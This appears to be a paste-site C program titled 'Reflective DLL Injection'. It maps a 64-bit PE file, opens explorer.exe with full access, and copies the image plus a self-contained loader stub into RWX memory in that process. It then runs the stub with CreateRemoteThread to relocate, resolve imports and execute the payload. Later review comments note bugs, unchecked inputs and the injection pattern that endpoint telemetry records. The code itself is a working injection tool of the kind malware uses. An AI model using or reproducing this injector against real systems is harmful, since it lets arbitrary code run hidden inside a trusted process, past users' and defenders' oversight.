
Reflective DLL Injection

Dec 10th, 2018
  1. #include<stdio.h>
  2. #include<windows.h>
  3. #include<tlhelp32.h>
  4. #include<string.h>
  5.  
  6.  
/*
 * Parameter block consumed by AdjustPE() after it has been copied into the
 * target process. main() writes this struct into the remote allocation
 * immediately before the copied AdjustPE code and passes its address as the
 * thread parameter, so both sides must agree on the layout exactly.
 */
typedef struct _PE_INFO
{
    LPVOID base;     // Address the image was written to in the remote process
    BOOL reloc;      // Non-zero when the image is not at its preferred ImageBase, i.e. base relocations must be applied
    LPVOID Get_Proc; // Address OF GetProcAddress() in this process; presumably valid in the target too (shared kernel32 mapping) — not verified anywhere
    LPVOID Load_DLL; // Address OF LoadLibraryA(); same assumption
}PE_INFO , * LPE_INFO;
  14.  
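/*
 * Map a file read-only into this process and return the base of the view.
 *
 * FileName: NUL-terminated path of the file to map.
 * Returns the view base on success, NULL on any failure (nonexistent file,
 * mapping or view creation error).
 *
 * Ownership: the caller releases the view with UnmapViewOfFile(). Nothing
 * else is left open — the file handle and the mapping-object handle are
 * closed on every path here (the original leaked both on success and on the
 * later failure paths). A mapped view keeps the mapping object, and the
 * mapping object keeps the file, referenced on their own.
 */
LPVOID Read_in_Memory(char * FileName)
{
    HANDLE f = CreateFileA(FileName, GENERIC_READ, FILE_SHARE_READ, 0,
                           OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (f == INVALID_HANDLE_VALUE)
        return NULL;

    HANDLE h = CreateFileMappingA(f, NULL, PAGE_READONLY, 0, 0, NULL);
    /* The mapping object (if created) holds its own file reference; our handle can go. */
    CloseHandle(f);
    if (h == NULL)
        return NULL;

    LPVOID mem = MapViewOfFile(h, FILE_MAP_READ, 0, 0, 0);
    /* Closing the mapping handle does not unmap an existing view. */
    CloseHandle(h);

    return mem; /* NULL when MapViewOfFile failed */
}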
  32.  
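/*
 * Find the first running process whose executable name equals process_name
 * and open a handle to it.
 *
 * process_name: exact, case-sensitive image name as reported in
 *               PROCESSENTRY32.szExeFile. The strcmp() on szExeFile presumes
 *               the ANSI PROCESSENTRY32 (a UNICODE build would not compile).
 * Returns a handle opened with PROCESS_ALL_ACCESS, or NULL when the snapshot
 * cannot be taken, no process matches, or OpenProcess() fails (e.g. a
 * process the caller lacks rights for). The caller owns the returned handle
 * and must CloseHandle() it.
 *
 * The snapshot handle is released on every path; the original leaked it when
 * Process32First() failed. Note for defenders: a PROCESS_ALL_ACCESS open of
 * another process is a commonly audited event.
 */
HANDLE Find_Process(char * process_name)
{
    PROCESSENTRY32 ps = { .dwSize = sizeof(ps) }; /* dwSize must be set before Process32First */
    DWORD pid = 0;
    BOOL found = 0;

    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE)
        return NULL;

    if (Process32First(snap, &ps)) {
        do {
            if (strcmp(process_name, ps.szExeFile) == 0) {
                found = 1;
                pid = ps.th32ProcessID; /* keep the PID; ps is not needed after the snapshot is closed */
                break;
            }
        } while (Process32Next(snap, &ps));
    }
    CloseHandle(snap); /* single release point, before any early return */

    if (!found)
        return NULL;

    /* OpenProcess() returns NULL on failure, which is exactly our error value. */
    return OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
}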
  67.  
  68.  
/*
 * Finish loading an image that main() has already copied, section by
 * section, into the target process: apply base relocations (if the image
 * was not placed at its preferred base), resolve imports, run TLS callbacks,
 * then call the image entry point with DLL_PROCESS_ATTACH.
 *
 * This function does not run in this process. main() copies its raw bytes
 * (up to the address of main) into the target and starts a thread on them,
 * so the body relies on being self-contained: every external address comes
 * through pe (Load_DLL, Get_Proc), there are no string literals, no calls to
 * other functions of this module and no globals. Any compiler-inserted call
 * (stack protector, inlined helpers, etc.) would presumably break the copy.
 *
 * pe: parameter block written by main() directly in front of the copied
 *     code; pe->base is the remote image base.
 *
 * Nothing here is validated: every RVA, size and count is taken from the
 * on-disk headers as-is, so a malformed image can write anywhere in the
 * target process. Return values of Load_DLL/Get_Proc and the entry point
 * are not checked either.
 *
 * Pointer arithmetic on LPVOID (void *) throughout is a GCC/Clang extension
 * (byte arithmetic); it is not standard C and MSVC rejects it.
 */
void AdjustPE(LPE_INFO pe)
{
    PIMAGE_DOS_HEADER dos;
    PIMAGE_NT_HEADERS nt;
    LPVOID base;
    PIMAGE_IMPORT_DESCRIPTOR import;
    PIMAGE_THUNK_DATA Othunk,Fthunk;
    PIMAGE_BASE_RELOCATION reloc;
    PIMAGE_TLS_DIRECTORY tls;
    PIMAGE_TLS_CALLBACK * CallBack;
    ULONGLONG * p,delta; // p: 64-bit fixup target; delta: actual base minus preferred base (unsigned, wraps if negative — the += below wraps back)
   
    BOOL (*DLL_Entry)(LPVOID , DWORD , LPVOID );
    LPVOID (*Load_DLL)(LPSTR );
    LPVOID (*Get_Proc)(LPVOID , LPSTR );
   
    base=pe->base;
    Load_DLL=pe->Load_DLL;
    Get_Proc=pe->Get_Proc;
   
    dos=(PIMAGE_DOS_HEADER)base;
    nt=(PIMAGE_NT_HEADERS)(base+dos->e_lfanew);
   
    // Entry point resolved up front; whether the image is really a DLL (IMAGE_FILE_DLL) is never checked.
    DLL_Entry=base+nt->OptionalHeader.AddressOfEntryPoint;
   
    if(!pe->reloc)
    goto Load_Import;
   
    // Pass 1: base relocations. DataDirectory[5] is IMAGE_DIRECTORY_ENTRY_BASERELOC.
    // (The Base_Relocation label is never the target of a goto; it only documents the pass.)
    Base_Relocation:
        if(nt->OptionalHeader.DataDirectory[5].VirtualAddress==0) //No Relocation Table Found
        goto Load_Import;
        delta=(ULONGLONG)base-nt->OptionalHeader.ImageBase;
        reloc=(PIMAGE_BASE_RELOCATION)(base+nt->OptionalHeader.DataDirectory[5].VirtualAddress);
        while(reloc->VirtualAddress)
        {
            LPVOID dest=base+reloc->VirtualAddress;
            // Each entry is one WORD: type in the top 4 bits, page offset in the low 12.
            // SizeOfBlock is trusted; a value below sizeof(IMAGE_BASE_RELOCATION) underflows.
            int nEntry=(reloc->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2;
            PWORD data=(PWORD)((LPVOID)reloc+sizeof(IMAGE_BASE_RELOCATION));
            int i;
            for(i=0;i<nEntry;i++,data++)
            {
                // Only type 10 (IMAGE_REL_BASED_DIR64) is applied; ABSOLUTE padding entries
                // and every other relocation type are silently skipped.
                if(((*data)>>12)==10)
                {
                    p=(PULONGLONG)(dest+((*data)&0xfff));
                    *p+=delta;
                }
            }
           
            reloc=(PIMAGE_BASE_RELOCATION)((LPVOID)reloc+reloc->SizeOfBlock);
           
        }
        //End OF base Relocation
       
    // Pass 2: imports. DataDirectory[1] is IMAGE_DIRECTORY_ENTRY_IMPORT.
    Load_Import:
        if(nt->OptionalHeader.DataDirectory[1].VirtualAddress==0)
        goto TLS_CallBack;
        import=(PIMAGE_IMPORT_DESCRIPTOR)(base+nt->OptionalHeader.DataDirectory[1].VirtualAddress);
        while(import->Name)
        {
            // Unchecked: if the DLL cannot be loaded, dll is NULL and every thunk below is filled with whatever Get_Proc(NULL, ...) returns.
            LPVOID dll=(*Load_DLL)(base+import->Name);
            Othunk=(PIMAGE_THUNK_DATA)(base+import->OriginalFirstThunk);
            Fthunk=(PIMAGE_THUNK_DATA)(base+import->FirstThunk);
           
            // No import lookup table: read the names from the IAT itself (it is still unbound).
            if(!import->OriginalFirstThunk)
            Othunk=Fthunk;
           
            // Writes into the IAT are possible because main() mapped the whole image RWX.
            // 64-bit thunks only, which matches main()'s PE32+ check.
            while(Othunk->u1.AddressOfData)
            {
                if(Othunk->u1.Ordinal & IMAGE_ORDINAL_FLAG)
                {
                    *(ULONGLONG *)Fthunk=(ULONGLONG)(*Get_Proc)(dll,(LPSTR)IMAGE_ORDINAL(Othunk->u1.Ordinal));
                }
                else
                {
                    PIMAGE_IMPORT_BY_NAME fnm=(PIMAGE_IMPORT_BY_NAME)(base+Othunk->u1.AddressOfData);
                    *(PULONGLONG)Fthunk=(ULONGLONG)(*Get_Proc)(dll,fnm->Name);
                }
                Othunk++;
                Fthunk++;
            }
            import++;
        }
   
   
    // Pass 3: TLS callbacks. DataDirectory[9] is IMAGE_DIRECTORY_ENTRY_TLS.
    TLS_CallBack:
        if(nt->OptionalHeader.DataDirectory[9].VirtualAddress==0)
        goto Execute_Entry;
        tls=(PIMAGE_TLS_DIRECTORY)(base+nt->OptionalHeader.DataDirectory[9].VirtualAddress);
        if(tls->AddressOfCallBacks==0)
        goto Execute_Entry;
       
        // AddressOfCallBacks is used as an absolute address, not base-relative;
        // presumably pass 1 has already fixed it up when the image was moved — confirm.
        CallBack=(PIMAGE_TLS_CALLBACK *)(tls->AddressOfCallBacks);
        while(*CallBack)
        {
            (*CallBack)(base,DLL_PROCESS_ATTACH,NULL);
            CallBack++;
        }
   
   
    // Pass 4: entry point, called as DllMain(base, DLL_PROCESS_ATTACH, NULL); its result is ignored.
    Execute_Entry: 
        (*DLL_Entry)(base,DLL_PROCESS_ATTACH,NULL);
   
}
  172.  
  173.  
/*
 * Entry point: map a 64-bit PE from disk, copy it into explorer.exe, then
 * copy AdjustPE and a PE_INFO block into the target and start a remote
 * thread on the copied code to finish loading it there.
 *
 * Parameters: i is argc (reused as the section loop counter below), arg is
 * argv; arg[1] is the PE path. Always returns 0, so the exit code does not
 * reflect any of the failure paths.
 *
 * The image is never handed to the Windows loader, so in the target it is
 * only a private executable region; from a detection standpoint the
 * VirtualAllocEx(RWX) + WriteProcessMemory + CreateRemoteThread sequence into
 * another process is the classic injection pattern that endpoint telemetry
 * records.
 *
 * Resource handling: proc is never closed, the file view from
 * Read_in_Memory is never unmapped, the CreateRemoteThread handle is
 * discarded, and Rbase is freed only when the second allocation fails.
 * WriteProcessMemory return values are not checked.
 */
int main(int i,char **arg)
{
    if(i!=2)
    {
        printf("Usage %s <pe>",*arg);
        return 0;
    }
   
    HANDLE proc;
    LPVOID base,Rbase,Adj; // base: local read-only view; Rbase: remote image; Adj: remote PE_INFO + AdjustPE code
    PIMAGE_DOS_HEADER dos;
    PIMAGE_SECTION_HEADER sec;
    PIMAGE_NT_HEADERS nt;
    DWORD Func_Size;
    PE_INFO pe;
   
    printf("[+]Opening File...\n");
   
    if((base=Read_in_Memory(*(arg+1)))==NULL)
    {
        printf("[-]File I/O Error");
        return 0;
    }
   
    dos=(PIMAGE_DOS_HEADER)base;
   
    // 23117 == 0x5A4D == "MZ" (IMAGE_DOS_SIGNATURE). e_lfanew is not range-checked against the file size.
    if(dos->e_magic!=23117)
    {
        printf("[-]Invalid File");
        return 0;
    }
   
    // Pointer arithmetic on LPVOID (void *) is a GCC/Clang extension; not portable to MSVC.
    nt=(PIMAGE_NT_HEADERS)(base+dos->e_lfanew);
    // 24 == sizeof(Signature) + sizeof(IMAGE_FILE_HEADER); equivalent to IMAGE_FIRST_SECTION(nt).
    sec=(PIMAGE_SECTION_HEADER)((LPVOID)nt+24+nt->FileHeader.SizeOfOptionalHeader);
   
    // Only PE32+ is accepted; AdjustPE writes 64-bit thunks and DIR64 fixups.
    if(nt->OptionalHeader.Magic!=IMAGE_NT_OPTIONAL_HDR64_MAGIC)
    {
        printf("[-]This is not 64 bit pe");
        return 0;
    }
   
    printf("\n[+]Open Process.....");
   
    // Target is hard-coded.
    if((proc=Find_Process("explorer.exe"))==NULL)
    {
        printf("[-]Failed To Open Process");
        return 0;
    }
   
    printf("[+]Allocating Memory Into Remote Process");
   
    pe.reloc=0;
   
    // First try the preferred ImageBase (no relocation needed); otherwise take any address and tell AdjustPE to relocate.
    // The entire image is one RWX region; per-section protections are not applied.
    if((Rbase=VirtualAllocEx(proc,(LPVOID)nt->OptionalHeader.ImageBase,nt->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
    {
        // NOTE(review): %#p expects a pointer but ImageBase is a ULONGLONG — format/argument mismatch (undefined behavior per C); cast to (void *) or print with a 64-bit hex specifier.
        printf("\n[!]Failed To Allocate Memory AT %#p\n[!]Trying Alternative\n",nt->OptionalHeader.ImageBase);
        pe.reloc=1;
        if((Rbase=VirtualAllocEx(proc,NULL,nt->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
        {
            printf("[-]Failed To Allocate Memory Into Remote Process");
            return 0;
        }
    }
   
    printf("\n[+]Copying Headers");
    WriteProcessMemory(proc,Rbase,base,nt->OptionalHeader.SizeOfHeaders,NULL);
    printf("\n[+]Copying Sections...");
    // Raw section data copied to its virtual address; PointerToRawData/SizeOfRawData are not checked against the mapped file size.
    for(i=0;i<nt->FileHeader.NumberOfSections;i++)
    {
        WriteProcessMemory(proc,Rbase+sec->VirtualAddress,base+sec->PointerToRawData,sec->SizeOfRawData,NULL);
        sec++;
    }
   
    // Size of AdjustPE is taken as "distance to main": relies on the compiler laying main out
    // immediately after AdjustPE with nothing in between, and on AdjustPE being position independent.
    // Function reordering, inlining or LTO would presumably break this.
    Func_Size=(DWORD)((ULONGLONG)main-(ULONGLONG)AdjustPE);
    pe.base=Rbase;
    pe.Get_Proc=GetProcAddress; // assumed to be at the same address in the target (same kernel32 mapping) — not verified
    pe.Load_DLL=LoadLibraryA;
   
    // Remote layout: [PE_INFO][AdjustPE code]; allocated RWX like the image.
    if((Adj=VirtualAllocEx(proc,NULL,Func_Size+sizeof(pe),MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
    {
        printf("\n[-]Failed To Allocate Memory for PE adjusting");
        VirtualFreeEx(proc,Rbase,0,MEM_RELEASE);
        return 0;
    }
   
    WriteProcessMemory(proc,Adj,&pe,sizeof(pe),NULL);
    WriteProcessMemory(proc,Adj+sizeof(pe),AdjustPE,Func_Size,NULL);
    // Thread start = copied AdjustPE, thread parameter = the PE_INFO in front of it.
    // The returned thread handle is dropped; on failure Rbase and Adj stay allocated in the target.
    if(!CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)(Adj+sizeof(pe)),Adj,0,NULL))
    printf("\n[-]Failed TO Adjust PE");
    else
    printf("\n[+]Adjusting PE And Executing....");
   
    return 0;
   
}